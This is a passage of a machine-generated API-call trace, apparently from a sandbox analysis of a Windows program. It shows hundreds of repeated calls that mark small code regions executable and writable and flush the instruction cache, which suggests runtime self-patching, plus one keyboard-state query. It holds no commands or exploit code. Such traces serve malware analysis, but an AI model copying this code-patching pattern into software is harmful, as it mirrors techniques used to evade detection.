lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.118] GetCurrentProcess () returned 0xffffffff [0102.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.118] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.118] GetCurrentProcess () returned 0xffffffff [0102.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.118] GetCurrentProcess () returned 0xffffffff [0102.118] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.119] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.119] GetCurrentProcess () returned 0xffffffff [0102.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.119] GetCurrentProcess () returned 0xffffffff [0102.119] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.119] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.120] GetCurrentProcess () returned 0xffffffff [0102.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.120] GetCurrentProcess () returned 0xffffffff [0102.120] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.120] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.121] GetCurrentProcess () returned 0xffffffff [0102.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.121] GetCurrentProcess () returned 0xffffffff [0102.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.121] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.121] GetCurrentProcess () returned 0xffffffff [0102.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.121] GetCurrentProcess () returned 0xffffffff [0102.121] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.121] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.122] GetCurrentProcess () returned 0xffffffff [0102.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.122] GetCurrentProcess () returned 0xffffffff [0102.122] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.122] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.123] GetCurrentProcess () returned 0xffffffff [0102.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.123] GetCurrentProcess () returned 0xffffffff [0102.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.123] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.123] GetCurrentProcess () returned 0xffffffff [0102.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.123] GetCurrentProcess () returned 0xffffffff [0102.123] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.123] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.124] GetCurrentProcess () returned 0xffffffff [0102.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.124] GetCurrentProcess () returned 0xffffffff [0102.124] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.124] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.125] GetCurrentProcess () returned 0xffffffff [0102.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.125] GetCurrentProcess () returned 0xffffffff [0102.125] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.125] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.126] GetCurrentProcess () returned 0xffffffff [0102.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.126] GetCurrentProcess () returned 0xffffffff [0102.126] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.127] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.127] GetCurrentProcess () returned 0xffffffff [0102.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.127] GetCurrentProcess () returned 0xffffffff [0102.127] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.127] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.128] GetCurrentProcess () returned 0xffffffff [0102.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.128] GetCurrentProcess () returned 0xffffffff [0102.128] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.128] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.129] GetCurrentProcess () returned 0xffffffff [0102.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.129] GetCurrentProcess () returned 0xffffffff [0102.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.129] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.129] GetCurrentProcess () returned 0xffffffff [0102.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.129] GetCurrentProcess () returned 0xffffffff [0102.129] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.129] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.130] GetCurrentProcess () returned 0xffffffff [0102.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.130] GetCurrentProcess () returned 0xffffffff [0102.130] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.130] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.131] GetCurrentProcess () returned 0xffffffff [0102.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.131] GetCurrentProcess () returned 0xffffffff [0102.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.131] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.131] GetCurrentProcess () returned 0xffffffff [0102.131] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.131] GetCurrentProcess () returned 0xffffffff [0102.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.132] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.132] GetCurrentProcess () returned 0xffffffff [0102.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.132] GetCurrentProcess () returned 0xffffffff [0102.132] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.132] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.133] GetCurrentProcess () returned 0xffffffff [0102.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.133] GetCurrentProcess () returned 0xffffffff [0102.133] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.133] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.134] GetCurrentProcess () returned 0xffffffff [0102.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.134] GetCurrentProcess () returned 0xffffffff [0102.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.134] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.134] GetCurrentProcess () returned 0xffffffff [0102.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.134] GetCurrentProcess () returned 0xffffffff [0102.134] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.134] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.135] GetCurrentProcess () returned 0xffffffff [0102.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.135] GetCurrentProcess () returned 0xffffffff [0102.135] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.135] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.136] GetCurrentProcess () returned 0xffffffff [0102.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.136] GetCurrentProcess () returned 0xffffffff [0102.136] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.136] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.137] GetCurrentProcess () returned 0xffffffff [0102.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.137] GetCurrentProcess () returned 0xffffffff [0102.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e78, dwSize=0x14) returned 1 [0102.137] VirtualProtect (in: lpAddress=0xc7c4e78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.137] GetCurrentProcess () returned 0xffffffff [0102.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e79, dwSize=0x2) returned 1 [0102.137] GetCurrentProcess () returned 0xffffffff [0102.137] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e98, dwSize=0x14) returned 1 [0102.137] VirtualProtect (in: lpAddress=0xc7c4e98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.138] GetCurrentProcess () returned 0xffffffff [0102.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4e99, dwSize=0x2) returned 1 [0102.138] GetCurrentProcess () returned 0xffffffff [0102.138] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb8, dwSize=0x14) returned 1 [0102.138] VirtualProtect (in: lpAddress=0xc7c4eb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.139] GetCurrentProcess () returned 0xffffffff [0102.139] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7c4eb9, dwSize=0x2) returned 1 [0102.140] GetAsyncKeyState (vKey=3) returned 0 [0102.140] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0102.140] CRetailMalloc_Alloc () returned 0xc9869e8 [0102.140] memcpy (in: _Dst=0xcb65188, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xcb65188) returned 0xcb65188 [0102.140] memcpy (in: _Dst=0xc986a08, _Src=0x197724, _Size=0x18 | out: _Dst=0xc986a08) returned 0xc986a08 [0102.140] CRetailMalloc_Realloc () returned 0xc9869e8 [0102.140] CRetailMalloc_Free () returned 0x1 [0102.140] GetCurrentProcess () returned 0xffffffff [0102.140] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789c, dwSize=0x14) returned 1 [0102.140] VirtualProtect (in: lpAddress=0xf5f789c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.141] GetCurrentProcess () returned 0xffffffff [0102.141] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f789d, dwSize=0x2) returned 1 [0102.141] GetCurrentProcess () returned 0xffffffff [0102.141] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bc, dwSize=0x14) returned 1 [0102.141] VirtualProtect (in: lpAddress=0xf5f78bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.154] GetCurrentProcess () returned 0xffffffff [0102.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78bd, dwSize=0x2) returned 1 [0102.155] GetCurrentProcess () returned 0xffffffff [0102.155] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dc, dwSize=0x14) returned 1 [0102.155] VirtualProtect (in: lpAddress=0xf5f78dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.155] GetCurrentProcess () returned 0xffffffff [0102.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78dd, dwSize=0x2) returned 1 [0102.156] GetCurrentProcess () returned 0xffffffff [0102.156] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fc, dwSize=0x14) returned 1 [0102.156] VirtualProtect (in: lpAddress=0xf5f78fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.157] GetCurrentProcess () returned 0xffffffff [0102.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f78fd, dwSize=0x2) returned 1 [0102.157] GetCurrentProcess () returned 0xffffffff [0102.157] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791c, dwSize=0x14) returned 1 [0102.157] VirtualProtect (in: lpAddress=0xf5f791c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.158] GetCurrentProcess () returned 0xffffffff [0102.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f791d, dwSize=0x2) returned 1 [0102.158] GetCurrentProcess () returned 0xffffffff [0102.158] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793c, dwSize=0x14) returned 1 [0102.158] VirtualProtect (in: lpAddress=0xf5f793c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.159] GetCurrentProcess () returned 0xffffffff [0102.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f793d, dwSize=0x2) returned 1 [0102.159] GetCurrentProcess () returned 0xffffffff [0102.159] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795c, dwSize=0x14) returned 1 [0102.159] VirtualProtect (in: lpAddress=0xf5f795c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.160] GetCurrentProcess () returned 0xffffffff [0102.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f795d, dwSize=0x2) returned 1 [0102.160] GetCurrentProcess () returned 0xffffffff [0102.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797c, dwSize=0x14) returned 1 [0102.160] VirtualProtect (in: lpAddress=0xf5f797c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.160] GetCurrentProcess () returned 0xffffffff [0102.160] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f797d, dwSize=0x2) returned 1 [0102.160] GetCurrentProcess () returned 0xffffffff [0102.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799c, dwSize=0x14) returned 1 [0102.161] VirtualProtect (in: lpAddress=0xf5f799c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.161] GetCurrentProcess () returned 0xffffffff [0102.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f799d, dwSize=0x2) returned 1 [0102.161] GetCurrentProcess () returned 0xffffffff [0102.161] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bc, dwSize=0x14) returned 1 [0102.161] VirtualProtect (in: lpAddress=0xf5f79bc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.162] GetCurrentProcess () returned 0xffffffff [0102.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79bd, dwSize=0x2) returned 1 [0102.162] GetCurrentProcess () returned 0xffffffff [0102.162] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dc, dwSize=0x14) returned 1 [0102.162] VirtualProtect (in: lpAddress=0xf5f79dc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.163] GetCurrentProcess () returned 0xffffffff [0102.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79dd, dwSize=0x2) returned 1 [0102.163] GetCurrentProcess () returned 0xffffffff [0102.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fc, dwSize=0x14) returned 1 [0102.163] VirtualProtect (in: lpAddress=0xf5f79fc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.163] GetCurrentProcess () returned 0xffffffff [0102.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf5f79fd, dwSize=0x2) returned 1 [0102.163] GetCurrentProcess () returned 0xffffffff [0102.163] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737248, dwSize=0x14) returned 1 [0102.163] VirtualProtect (in: lpAddress=0xc737248, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.164] GetCurrentProcess () returned 0xffffffff [0102.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737249, dwSize=0x2) returned 1 [0102.164] GetCurrentProcess () returned 0xffffffff [0102.164] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737268, dwSize=0x14) returned 1 [0102.164] VirtualProtect (in: lpAddress=0xc737268, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.165] GetCurrentProcess () returned 0xffffffff [0102.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737269, dwSize=0x2) returned 1 [0102.165] GetCurrentProcess () returned 0xffffffff [0102.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737288, dwSize=0x14) returned 1 [0102.165] VirtualProtect (in: lpAddress=0xc737288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.165] GetCurrentProcess () returned 0xffffffff [0102.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737289, dwSize=0x2) returned 1 [0102.165] GetCurrentProcess () returned 0xffffffff [0102.165] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a8, dwSize=0x14) returned 1 [0102.165] VirtualProtect (in: lpAddress=0xc7372a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.166] GetCurrentProcess () returned 0xffffffff [0102.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372a9, dwSize=0x2) returned 1 [0102.166] GetCurrentProcess () returned 0xffffffff [0102.166] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c8, dwSize=0x14) returned 1 [0102.166] VirtualProtect (in: lpAddress=0xc7372c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.167] GetCurrentProcess () returned 0xffffffff [0102.167] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372c9, dwSize=0x2) returned 1 [0102.167] GetCurrentProcess () returned 0xffffffff [0102.167] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e8, dwSize=0x14) returned 1 [0102.167] VirtualProtect (in: lpAddress=0xc7372e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.168] GetCurrentProcess () returned 0xffffffff [0102.168] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7372e9, dwSize=0x2) returned 1 [0102.168] GetCurrentProcess () returned 0xffffffff [0102.168] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737308, dwSize=0x14) returned 1 [0102.168] VirtualProtect (in: lpAddress=0xc737308, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.168] GetCurrentProcess () returned 0xffffffff [0102.168] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737309, dwSize=0x2) returned 1 [0102.168] GetCurrentProcess () returned 0xffffffff [0102.168] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737328, dwSize=0x14) returned 1 [0102.168] VirtualProtect (in: lpAddress=0xc737328, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.169] GetCurrentProcess () returned 0xffffffff [0102.169] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737329, dwSize=0x2) returned 1 [0102.169] GetCurrentProcess () returned 0xffffffff [0102.169] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737348, dwSize=0x14) returned 1 [0102.169] VirtualProtect (in: lpAddress=0xc737348, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.170] GetCurrentProcess () returned 0xffffffff [0102.170] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737349, dwSize=0x2) returned 1 [0102.170] GetCurrentProcess () returned 0xffffffff [0102.170] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737368, dwSize=0x14) returned 1 [0102.170] VirtualProtect (in: lpAddress=0xc737368, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.170] GetCurrentProcess () returned 0xffffffff [0102.170] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737369, dwSize=0x2) returned 1 [0102.170] GetCurrentProcess () returned 0xffffffff [0102.171] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737388, dwSize=0x14) returned 1 [0102.171] VirtualProtect (in: lpAddress=0xc737388, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.171] GetCurrentProcess () returned 0xffffffff [0102.171] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737389, dwSize=0x2) returned 1 [0102.171] GetCurrentProcess () returned 0xffffffff [0102.171] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a8, dwSize=0x14) returned 1 [0102.171] VirtualProtect (in: lpAddress=0xc7373a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.172] GetCurrentProcess () returned 0xffffffff [0102.172] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373a9, dwSize=0x2) returned 1 [0102.172] GetCurrentProcess () returned 0xffffffff [0102.172] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c8, dwSize=0x14) returned 1 [0102.172] VirtualProtect (in: lpAddress=0xc7373c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.173] GetCurrentProcess () returned 0xffffffff [0102.173] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373c9, dwSize=0x2) returned 1 [0102.173] GetCurrentProcess () returned 0xffffffff [0102.173] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e8, dwSize=0x14) returned 1 [0102.173] VirtualProtect (in: lpAddress=0xc7373e8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.175] GetCurrentProcess () returned 0xffffffff [0102.175] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc7373e9, dwSize=0x2) returned 1 [0102.175] GetCurrentProcess () returned 0xffffffff [0102.175] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737408, dwSize=0x14) returned 1 [0102.175] VirtualProtect (in: lpAddress=0xc737408, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.176] GetCurrentProcess () returned 0xffffffff [0102.176] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737409, dwSize=0x2) returned 1 [0102.176] GetCurrentProcess () returned 0xffffffff [0102.176] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737428, dwSize=0x14) returned 1 [0102.176] VirtualProtect (in: lpAddress=0xc737428, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0102.177] GetCurrentProcess () returned 0xffffffff [0102.177] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc737429, dwSize=0x2) returned 1 [0102.177] GetCurrentProcess () returned 0xffffffff [0102.177] FlushInstructionCache (hProcess=0xffffffff, 